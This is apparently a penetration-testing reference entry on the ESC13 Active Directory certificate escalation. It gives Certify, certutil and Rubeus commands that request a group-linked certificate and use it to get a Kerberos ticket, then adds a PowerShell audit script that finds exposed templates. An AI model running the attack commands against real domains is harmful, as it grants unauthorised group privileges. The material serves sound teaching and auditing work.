ESC13

If a principal (user or computer) has enrollment rights on a certificate template that is configured with an issuance policy, and that issuance policy has an OID group link, the principal can enroll for a certificate that grants access to the environment as a member of the group specified in the OID group link.

Windows

Request a certificate from the certificate template <template_name>

.\Certify.exe request /ca:<ca> /template:<template_name>

Save and convert the certificate

certutil -MergePFX .\esc13.pem .\esc13.pfx

Confirm the Client Authentication EKU and the ESC13OID issuance policy

certutil -Dump -v .\esc13.pfx

Authenticate (using the certificate)

.\Rubeus.exe asktgt /user:<user> /certificate:C:\esc13.pfx /nowrap
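
To audit for the condition described above, the following added example (not part of the original page or of the tools it uses) lists every certificate template that references an issuance policy carrying an OID group link, together with the linked group and the principals allowed to enroll. It assumes the RSAT ActiveDirectory module and read access to the Configuration partition; the output column names are this example's own.

```powershell
# Added audit example (not from the original page): report ESC13-exposed templates.
# Assumes the RSAT ActiveDirectory module and read access to the Configuration partition.
Import-Module ActiveDirectory

$pkiBase    = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
$enrollGuid = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$extRight   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$clientAuth = '1.3.6.1.5.5.7.3.2'                            # Client Authentication EKU

# 1. Issuance policy objects that carry an OID group link, keyed by policy OID.
$linked = @{}
Get-ADObject -SearchBase "CN=OID,$pkiBase" `
    -LDAPFilter '(&(objectClass=msPKI-Enterprise-Oid)(msDS-OIDToGroupLink=*))' `
    -Properties displayName, 'msPKI-Cert-Template-OID', 'msDS-OIDToGroupLink' |
    ForEach-Object { $linked[$_.'msPKI-Cert-Template-OID'] = $_ }

# 2. Templates that reference one of those policies, with the principals that may enroll.
Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" `
    -LDAPFilter '(&(objectClass=pKICertificateTemplate)(msPKI-Certificate-Policy=*))' `
    -Properties 'msPKI-Certificate-Policy', pKIExtendedKeyUsage, nTSecurityDescriptor |
    ForEach-Object {
        $template = $_
        # Allow ACEs granting the enroll extended right (or all extended rights).
        $enrollers = $template.nTSecurityDescriptor.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (($_.ActiveDirectoryRights -band $extRight) -eq $extRight) -and
            ($_.ObjectType -eq $enrollGuid -or $_.ObjectType -eq [guid]::Empty)
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique

        foreach ($oid in $template.'msPKI-Certificate-Policy') {
            if (-not $linked.ContainsKey($oid)) { continue }   # policy has no group link
            [pscustomobject]@{
                Template    = $template.Name
                PolicyOid   = $oid
                PolicyName  = $linked[$oid].displayName
                LinkedGroup = $linked[$oid].'msDS-OIDToGroupLink'
                ClientAuth  = $template.pKIExtendedKeyUsage -contains $clientAuth
                CanEnroll   = $enrollers -join '; '
            }
        }
    } | Format-List
```

An empty result means no template references a group-linked issuance policy. The ClientAuth column checks only for the Client Authentication EKU named above.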